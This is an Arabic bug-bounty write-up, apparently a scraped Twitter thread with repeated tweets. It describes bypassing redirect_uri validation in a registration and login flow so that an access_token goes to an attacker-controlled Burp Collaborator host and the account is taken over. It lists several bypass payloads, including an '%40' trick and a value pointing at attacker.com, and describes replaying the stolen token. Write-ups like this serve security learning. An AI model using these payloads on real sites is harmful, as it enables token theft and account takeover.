كيف قدرت القى ثغرة؟
🔴Open Redirect Validation Bypass Leads To Account Take Over (ATO)
الثغرة كانت ب engagement لي وكان السكوب *
- اول شيء بديت افهم واتصفح الموقع
- بعدين بديت بال register function واول شيء طاحت عليه عيني الredirect_uri" parameter"
1/5
🔴Open Redirect Validation Bypass Leads To Account Take Over (ATO)
الثغرة كانت ب engagement لي وكان السكوب *
- اول شيء بديت افهم واتصفح الموقع
- بعدين بديت بال register function واول شيء طاحت عليه عيني الredirect_uri" parameter"
1/5
- ف حاولت اني اجرب open redirect ولكن للاسف طلع فيه regex للبراميتر
- كملت عملية ال register بشكل عادي
- ولاحظت انه اذا جيت تسوي login بعد ال register
- يصير "Redirect as "GET Request
والمثير اكثر ال access_token" parameter" مثل موضح بالصورة
2/5
- كملت عملية ال register بشكل عادي
- ولاحظت انه اذا جيت تسوي login بعد ال register
- يصير "Redirect as "GET Request
والمثير اكثر ال access_token" parameter" مثل موضح بالصورة
2/5
- بمعنى اذا قدرت اخذت قيمة ال "access_token" بطريقة ما اقدر احصل على Full ATO
- فقلت بسسس لازم القى bypass لل "redirect_uri" عشان اقدر اوصله الى ATO والمشكلة ال Validation بالراميتير لازم ال Host وال TLD ورا بعض بدون تعديل مثال
redirect_uri=target\attacker\.org\com-> Error
3/5
- فقلت بسسس لازم القى bypass لل "redirect_uri" عشان اقدر اوصله الى ATO والمشكلة ال Validation بالراميتير لازم ال Host وال TLD ورا بعض بدون تعديل مثال
redirect_uri=target\attacker\.org\com-> Error
3/5
بعد مافهمت ال regex الي يصير على ال "redirect_uri"
حاولت اني اجرب ال payloads هذي
trarget.\com/%09/myburpcollab
trarget.\com//myburpcollab
trarget.\com\\myburpcollab
target.\com/%0d/myburpcollab
redirect_uri=target.\com&redirect_uri=attacker\.com
4/5
حاولت اني اجرب ال payloads هذي
trarget.\com/%09/myburpcollab
trarget.\com//myburpcollab
trarget.\com\\myburpcollab
target.\com/%0d/myburpcollab
redirect_uri=target.\com&redirect_uri=attacker\.com
4/5
- لكن للأسف ولا واحد ضبط الى ان جربت redirect_uri=target.\com%40myburpcollab.\com
واول ماسويت Login صار Redirect على ال burp collab !!
واول ماسويت Login صار Redirect على ال burp collab !!
- وقدرت اخذ ال access_token !
- ف على طول نسخت"access_token" واضفته بعد دومين التارقت نفس كذا target\.com/?access_token=jwt-token
وقدرت اخذ full access للحساب !
بالنهاية اتمنى شرحي كان واضح
- لاتنسى Like & Retweet شكرا لقرائتك !
medium: @ozomarzu/open-redirect-validation-bypass-leads-to-account-take-over-ato-5166b3416e3f" target="_blank" rel="noopener" onclick="event.stopPropagation()">medium.com
- ف على طول نسخت"access_token" واضفته بعد دومين التارقت نفس كذا target\.com/?access_token=jwt-token
وقدرت اخذ full access للحساب !
بالنهاية اتمنى شرحي كان واضح
- لاتنسى Like & Retweet شكرا لقرائتك !
medium: @ozomarzu/open-redirect-validation-bypass-leads-to-account-take-over-ato-5166b3416e3f" target="_blank" rel="noopener" onclick="event.stopPropagation()">medium.com
Loading suggestions...